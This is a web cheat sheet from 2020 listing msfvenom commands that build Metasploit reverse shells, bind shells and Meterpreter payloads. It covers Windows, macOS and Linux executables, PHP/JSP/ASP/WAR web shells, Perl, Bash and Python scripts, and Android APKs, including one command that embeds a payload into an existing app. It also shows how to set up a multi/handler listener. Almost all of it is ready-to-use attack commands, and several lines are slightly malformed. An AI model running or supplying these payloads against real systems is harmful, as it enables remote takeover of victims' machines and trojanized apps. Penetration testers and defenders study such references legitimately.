MsfVenom Payload Cheat Sheet

MSFvenom Payload Creator (MSFPC) is a user-friendly multiple payload generator that can be used to generate Metasploit payloads based on user-selected options. MSFvenom is a combination of Msfpayload and Msfencode, putting both of these tools into a single Framework instance. msfvenom replaced both msfpayload and msfencode as of June 8th, 2015.

Offensive Security

Metasploit Payload Listener

msfconsole
use exploit/multi/handler
set [payload-name]
set [ip-address]
set [port]
Run

Windows Payloads

Windows Meterpreter Reverse Shell:

msfvenom -p windows/meterpreter/reverse_tcp lhost=ip-address lport=port -f exe > payload-name.exe

Windows Reverse Shell:

msfvenom -p windows/shell/reverse_tcp lhost=ip-address lport=port -f exe > payload-name.exe

Windows Encoded Meterpreter Reverse Shell:

msfvenom -p windows/meterpreter/reverse_tcp -e shikata_ga_nai -i 2 -f exe > payload-name.exe

Windows Meterpreter Reverse Shellcode

msfvenom -p windows/meterpreter/reverse_tcp lhost=ip-address lport=port -f &lt platform 

MacOS Payloads

macOS Bind Shell:

msfvenom -p osx/x86/shell_bind_tcp rhost=ip-address lport=port-f macho > payload-name.macho

macOS Reverse Shell:

msfvenom -p osx/x86/shell_reverse_tcp lhost=ip-address lport=port -f macho > payload-name.macho

macOS Reverse TCP Shellcode:

msfvenom -p osx/x86/shell_reverse_tcp lhost=ip-address lport=port -f &lt platform 

Linux Payloads

Linux Meterpreter TCP Reverse Shell:

msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=ip-address lport=port -f elf > payload-name.elf

Linux Bind TCP Shell:

msfvenom -p generic/shell_bind_tcp rhost=ip-address lport=port -f elf > payload-name.elf

Linux Bind Meterpreter TCP Shell:

 msfvenom -p linux/x86/meterpreter/bind_tcp rhost=ip-address lport=port -f elf > payload-name.elf

Linux Meterpreter Reverse Shellcode:

 msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=ip-address lport=port -f < platform 

Web-based Payloads

PHP Meterpreter Reverse Shell:

 msfvenom -p php/meterpreter_reverse_tcp lhost=ip-address LPORT=port -f raw > payload-name.php

JSP Java Meterpreter Reverse Shell:

msfvenom -p java/jsp_shell_reverse_tcp lhost=ip-address lport=port -f raw > payload-name.jsp

ASP Meterpreter Reverse Shell:

 msfvenom -p windows/meterpreter/reverse_tcp lhost=ip-address lport=port -f asp > payload-nmae.asp

WAR Reverse TCP Shell:

msfvenom -p java/jsp_shell_reverse_tcp lhost=ip-address lport=port -f war > payload-name.war

Script-Based Payloads

Perl Unix Reverse shell:

 msfvenom -p cmd/unix/reverse_perl lhost=ip-address lport=port -f raw > payload-name.pl

Bash Unix Reverse Shell:

msfvenom -p cmd/unix/reverse_bash lhost=ip-address lport=port -f raw > payload-name.sh

Python Reverse Shell:

msfvenom -p cmd/unix/reverse_python lhost=ip-address lport=port -f raw > payload-name.py

Android Payloads

Android Meterpreter reverse Payload:

msfvenom –p android/meterpreter/reverse_tcp lhost=ip-address lport=port R > payload-name.apk

Android Embed Meterpreter Payload:

msfvenom -x <app.apk> android/meterpreter/reverse_tcp lhost=ip-address lport=port -o payload-name.apk
[Msf-Venom Payload Cheat Sheet Meterpreter Payload Cheat Sheet](/cheatsheet/MsfVenom-Payloads/)
Written on May 29, 2020